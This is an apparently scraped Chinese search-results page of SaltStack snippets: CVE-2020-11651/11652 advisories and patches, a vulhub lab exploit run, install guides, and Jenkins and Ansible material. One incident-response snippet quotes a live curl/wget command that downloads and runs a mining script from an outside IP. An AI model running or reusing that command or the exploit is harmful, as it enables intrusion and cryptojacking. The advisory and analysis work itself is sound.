0x03 影响版本 SaltStack < 2019.2.4 SaltStack < 3000.2 0x04 环境搭建 直接使用vulhub进行搭建 git clone https://github.com...salt=2019.2.3 靶机ip:192.168.232.170 攻击机ip:192.168.232.129 读取文件: python3 exploit.py --master 192.168.232.170...尝试反弹shell时发现,因为搭建的docker环境中并不存在nc命令 ? ?...0x06 修复方式 1、SaltStack官方已发布最新版本修复此漏洞,建议相关用户及时更新至安全版本及其以上,并开启SaltStack自动更新,以便实时获取补丁或升级至安全版本:https://repo.saltstack.com...参考链接: https://labs.f-secure.com/advisories/saltstack-authorization-bypass https://mp.weixin.qq.com/s
如何在Ubuntu 14.04上安装和配置Salt Master和Minion服务器 介绍 SaltStack是一个功能强大,灵活,高性能的配置管理和远程执行系统。...使用Salt-Bootstrap安装稳定版本 直接使用PPA的替代方法是使用salt-bootstrap脚本安装稳定版本。可以从SaltStack网站下载。...您可以选择使用此方法在上述方法上安装稳定系统的一个原因是它从pip包管理器中获取了一些依赖项。这可能会为您提供一些Salt依赖项的更新版本。 要开始使用,请移至您的主目录或您具有写入权限的其他位置。...这有助于访问更新的功能,更重要的是,可以访问PPA版本软件中可能无法使用的最新错误修复。 所需的salt-bootstrap脚本与我们上面使用的脚本相同。只有我们使用的选项会有所不同。...我们将结束命令git develop告诉脚本我们要使用SaltStack GitHub repo来安装最新的开发版本而不是Ubuntu PPA。
CVE-2021-3197: Salt-API的SSH客户端容易受到Shell注入的攻击,方法是在参数中包含ProxyCommand或通过API请求中提供的ssh_options。...CVE-2020-28243: Minion中的本地特权升级,当无特权的用户能够通过进程名称中的命令注入而能够在任何未列入黑名单的目录中创建文件时,SaltStack的Minion可以进行特权升级。...检查方式 1、检查是否开启salt-api 2、检查所使用的版本是否在受影响版本 修复建议 1、将SaltStack升级到3002.5, 3001.6 和 3000.8及以上的安全版本,或升级到Saltstack...2、使用安全产品进行防护与检测 腾讯T-Sec主机安全(云镜)漏洞库日期2021-1-22之后的版本,已支持SaltStack多个高危漏洞进行检测。...腾讯T-Sec云防火墙规则库日期2021-1-22之后的版本,已支持对SaltStack多个高危漏洞的检测和拦截。腾讯云防火墙内置的入侵防御功能,使用虚拟补丁机制防御最新的漏洞利用。
CVE-2020-25592:Salt中的eauth和ACL功能存在认证绕过漏洞,攻击者可以通过salt-api绕过身份验证,从而利用salt ssh连接目标主机。...salt --versions-report 4漏洞防护 4.1 官方升级 目前SaltStack官方已经发布新版本修复了以上漏洞,请受影响的用户尽快升级版本进行防护,官方下载链接:https://...repo.saltstack.com 4.2 修复补丁 若相关用户暂时无法进行升级操作,也可安装官方为以下版本提供的修补程序进行防护: 影响版本安全补丁链接SaltStack 2015.8.10、2015.8.13https...声明 本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。...如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。
描述 SaltStack是一套C/S架构的运维工具,服务端口默认为4505/4506,两个端口如果对外网开放危害非常大,黑客利用SaltStack的远程命令执行漏洞CVE-2020-11651可以直接绕过...找到可疑的命令执行内容: (curl -s 217.12.210.192/sa.sh||wget -q -O- 217.12.210.192/sa.sh)|sh 确认SaltStack版本,是否存在漏洞...脚本最后会从远程下载恶意二进制文件salt-store到/tmp或/var/tmp下: ?...* /var/tmp/salt-* 整改恢复 升级SaltStack到最新版本,修补CVE-2020-11651漏洞,升级前建议做好快照备份措施,安全版本下载地址参考:https://repo.saltstack.com...; 设置SaltStack为自动更新,及时获取相应补丁; 将Salt Master默认监听端口(默认4505和4506)设置为禁止对公网开放,或仅对可信对象开放,避免被黑客利用; 相关链接 https:
Saltstack的远程执行概念 远程执行是Saltstack的核心功能之一。主要使用Salt模块批量给选定的minion端执行相应的命令,并获得返回结果。...image.png salt:是saltstack自带的一个命令 * :表示目标主机,这里表示所有目标主机 test.ping:test是saltstack中的一个模块,ping则是这个模块下面的一个方法...所有命令(默认具备root操作权限,使用时需评估风险) image.png 4.4 pkg模块 功能:软件包状态管理,会根据操作系统不同,选择对应的安装方式(如CentOS系统默认使用yum,Debian..." #卸载 [root@Saltstack01 /]# salt'*' pkg.latest_version"vsftpd" #安装最新版本 [root@Saltstack01 /]# salt'*...salt'*' file.stats /etc/passwd #获取所有minion主机/etc/passwd的权限mode,如755,644 [root@Saltstack01 /]]# salt'
在4月29日,SaltStack已经发布新版本修复了漏洞。...CVE-2020-11652:攻击者利用该漏洞构造恶意请求,可以获取服务器目录结构,读取任意文件。...影响范围 SaltStack < 2019.2.4 SaltStack < 3000.2 修复方案 1.升级至最新安全版本,升级前注意进行快照备份。...2.设置Salt Master的默认监听端口(4505 和 4506)禁止对公网开放,或仅对可信IP开放。...参考链接 https://labs.f-secure.com/advisories/saltstack-authorization-bypass https://www.securityweek.com
版本控制和组件重用 你可以跟踪你的容器的版本更新,检查版本差异,如果有需要的话,可以回滚到以前的版本。容器会复用之前使用的layer中组件,这使得它非常轻量化。...Jenkins从GIT版本中拉取最新的提交版本后,自动加载测试环境并执行加载测试。我们也使用Jenkins来实现一键按需性能测试环境的搭建。...服务器 提供服务器健康状态的最新信息以及服务器上CPU、内存以及硬盘等状态最新变化的事件通知等。 浏览器 对用户在网站上的使用体验提供深入和可操作的优化策略和见解。...轻量级,易于使用 简单的配置语言(使用YAML文件) 我们这样使用Ansible Ansible允许我们集中管理所有的变化。...SaltStack使用Python开发, 它基于推式方法如推送配置文件到客户端。
而saltstack需要分别安装master和minion,master和minion之间可以通过ZeroMQ、RAET消息队列进行通信,salt在升级时,master版本需向后兼容,minion版本不能高于...二次开发 ansible和saltstack是基于Python开发,支持使用Python进行二次开发。...,如文件传输、web服务器、MySQL命令等。...ansible-vault 配置文件中如果包含密码等敏感信息,可以通过ansible-vault加密、解密文件。...如下playbook,执行一组定义为webservers的主机,使用root账号登录,并且定义了http_port、max_clients变量,会执行三个task,分别为安装最新hhtpd服务、拷贝/srv
打包工具:如mvn、go、npm、docker等 7 Pipeline 中涉及到的进阶工具链?...10 如何在 Pipeline 中设置构建参数? Jenkins支持参数化构建,包括凭据参数、字符参数、密码参数、布尔值参数、文件参数、文本参数、运行时参数、选项参数等。...(语法获取可以使用片段生成器,搜parallel) ? 12 如何在 Pipeline 中优雅的使用密文?...此触发方式使用的较少,最佳实践以webhook的方式触发构建更方便,但是在少量特殊场景,如每天需要构建,但是版本不发生变化时不构建可以应用此触发器 ?...在集成测试的时候需要大量的此类操作,公共组件构建了最新的版本要同时触发所有依赖他的构建项目进行构建,确保此版本能正常被业务应用使用。 ?
打包工具:如mvn、go、npm、docker等 七、Pipeline中涉及到的进阶工具链?...5.png 十、如何在pipeline中设置构建参数? Jenkins支持参数化构建,包括凭据参数、字符参数、密码参数、布尔值参数、文件参数、文本参数、运行时参数、选项参数等。...(语法获取可以使用片段生成器,搜parallel) 7.png 十二、如何在pipeline中优雅的使用密文?...此触发方式使用的较少,最佳实践以webhook的方式触发构建更方便,但是在少量特殊场景,如每天需要构建,但是版本不发生变化时不构建可以应用此触发器 10.png 十五、如何在pipeline中设置通过其他...在集成测试的时候需要大量的此类操作,公共组件构建了最新的版本要同时触发所有依赖他的构建项目进行构建,确保此版本能正常被业务应用使用。
在该工具的帮助下,广大研究人员可以轻松实现针对Linux操作系统的安全漏洞扫描任务,并及时获取最新的扫描结果。...,Salt-Scanner支持Salt v2016.11.x,如果你使用的是v2017.7.x或其他版本,请将salt-scanner.py脚本中的"expr_form"修改为"tgt_type"。...接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地: git clone https://github.com/0x4D31/salt-scanner.git 然后,切换到项目目录中,并使用pip...工具和项目提供的requirements.txt文件安装该工具所需的依赖组件: cd salt-scanner/ pip install requirements.txt 工具使用 $...TARGET_HOSTS, --target-hosts TARGET_HOSTS 设置目标主机 -tF {glob,list,grain}, --target-form {glob,list,grain} 从文件或数据源获取目标
笔直另外选在saltstack的原因是,在服务的开发团队中存在着不同的技术栈并行的状况,尤其是java和.net并存的情况下,saltstack对于windows的支持明显要优于ansible。...使用SaltStack的state编排文件,执行远程命令,通过Artifactory获取制品及配置,将需要的版本发布到线上。...部署 通过saltstack的sls特性,编排部署文件,对多个部署任务进行统一进行发布。...对于数据库等更新,如果回顾复杂,则需要在升级方案制定前就明确回滚方案或在业务中做好版本兼容。 3....也可以使用开源软件,如cvechecker,在编译流水线中对包进行扫描,防止由于安全漏洞造成的整个迭代失败。 四、后期完善 1.
Puppet和Chef使用的开发语言是Ruby,而Saltstack和Ansible使用的开发语言则是在运维开发这个圈子相对吃得开的Pythen,这也是SaltStack和Ansible相对于Puppet...,没想通如何在DevOps中调用Ansible接口,自己对Python亦不是太熟,因此便放弃了这种方式。...场景:在mysql5.6版本安装完成后会生成默认root用户的密码并写进~/.mysql_secret文件,那我们要在安装完成之后用这个root密码执行初始化操作就可以使用这种注册变量的方式。...扩展用法:判断某个文件或文件夹是否存在,来控制task是否执行。当when语句的结果为true时才执行task。 Include:文件加载,在一个任务文件中调用另一个任务文件。...如示例,在安装mysql时先去删除机器可能自带的mariadb-libs,在不存在mariadb-libs包时会报错,忽略此错误。 wait_for: 校验文件或端口的状态。
描述 SaltStack是一套C/S架构的运维工具,服务端口默认为4505/4506,两个端口如果对外网开放危害非常大,黑客利用SaltStack的远程命令执行漏洞CVE-2020-11651可以直接绕过...版本,是否存在漏洞CVE-2020-11651。...: 该脚本还会清理docker运行的挖矿程序: 脚本最后会从远程下载恶意二进制文件salt-store到/tmp或/var/tmp下: download2函数中会从bitbucket下载恶意二进制文件...* /var/tmp/salt-* 整改恢复 升级SaltStack到最新版本,修补CVE-2020-11651漏洞,升级前建议做好快照备份措施,安全版本下载地址参考:https://repo.saltstack.com...; 设置SaltStack为自动更新,及时获取相应补丁; 将Salt Master默认监听端口(默认4505和4506)设置为禁止对公网开放,或仅对可信对象开放,避免被黑客利用;
(部门项目一直习惯使用svn管理代码) 3. gitlab 保存项目配置文件 nginx定制配置文件 Dockerfile文件 说明:为什么这里会有svn和gitlab两个代码工具呢?...主要原因是:在rancher中每个服务的后端有时至少是两个以上的容器支持对外访问,分布在多个服务器上运行,同样的容一个镜像要分别pull到宿主机中,这个时间是成倍的(对于容器分布在不同宿主机上来说),saltstack...二、架构图说明 项目开发语言是php,使用了比较流行的laravel框架,项目中用到的laravel插件使用composer安装,npm安装全局模块,编译生成js样式文件 开发人员提交代码到svn,运维人员更改...nginx配置、项目env配置并提交到gitlab svn、gitlab钩子会触发jenkins执行下载对应项目的env、nginx配置文件、Dockerfile和最新版本的代码 Jenkins执行shell...来源:本文转自 andylhz 的博客,链接:https://blog.51cto.com/andylhz2009/2053741
这些模块是python写成的文件,里面会有好多函数,如cmd.run,当我们执行salt '*' cmd.run 'uptime'的时候,master下发任务匹配到的minion上去,minion执行模块函数..._handle_aes方法,将结果写的文件中 salt.client.LocalClient.cmd_cli通过轮询获取Job执行结果,将结果输出到终端。...测试salt: /etc/salt/master minion下配置: /etc/salt/minion/ master: master_ip或master_FQDN ##注明master的ip...highlight=full%20list%20builtin ‘ping’,’install’是执行模块下面的函数,同样参加上述链接查看帮助 ‘ftp’ 是函数的参数(arg),有的函数需要参数...>' SOURCE DEST salt-cp '*' testfile.html /tmp salt-cp 'test*' index.html /tmp/a.html salt-ssh 0.17.1版本加入的
无论如何,软件源中的 Maven 版本号都会比最新的 Maven 版本号要落后。 想要安装最新版的 Maven,按照文章第二部分提供的指令操作,从 Maven 官方网站下载二进制压缩包。...,我们将会创建符号链接指向 Maven 安装目录: sudo ln -s /opt/apache-maven-3.6.3 /opt/maven 当一个新的版本发布后,你可以按照以下方式升级你的 Maven...:解压一个新的版本,并且修改符号链接指向它。...最新版本的 Maven 已经在你的 Ubuntu 系统上安装成功了。 四、总结 我们已经向你展示如何在 Ubuntu 20.04 上安装 Apache Maven。...相关推荐 如何在 Ubuntu 20.04 上修改主机名 如何在 Ubuntu 20.04 上安装 Anaconda 如何在 Ubuntu 20.04 上安装和使用 Composer 如何在 Ubuntu
您可以使用默认的APT软件包存储库中包含的其中一个版本(5.5和5.6),也可以先手动添加MySQL的存储库来安装最新版本(目前为5.7)。...如果您不确定,可以使用mysql-serverAPT软件包,它只为您的Linux发行版安装最新版本。在撰写本文时,这是5.5,但您可以随时更新到另一个版本。...单击右下角的“ 下载”,然后从下一页上的谢谢,开始下载中复制链接。将.deb软件包下载到您的服务器。...如果您使用的是5.7.6或更高版本,则应使用mysqld --initialize。 但是,如果您从Debian发行版安装了5.7版,就像在第一步中一样,数据目录已自动初始化,因此您无需执行任何操作。...以下是您可以采取的后续步骤的几个示例: 实施一些额外的安全措施 使用Percona XtraBackup创建热备份 学习如何在Django应用程序或Ruby on Rails应用程序中使用MySQL 使用
docs.saltstack.cn/topics/targ… 命令格式:salt '' [参数] 1.1 查看被控制机的内存使用情况 [root@saltstack-master...以主机id名列表的形式进行过滤,格式与Python的列表相似,即不同主机id名称使用逗号分隔。...------ osfullname: CentOS 复制代码 1.4 获取主机发行版本为 6.5 的 Python 版本号 -G:--grain 根据被控主机的grains信息(..._2: True 其中pillar属性配置文件如下: httpd: root: /data 复制代码 1.6 探测 web1group(或web2group)被控主机的连通性 -N:--nodegroup...根据主控端master配置文件中的分组名称进行过滤。
领取专属 10元无门槛券
手把手带您无忧上云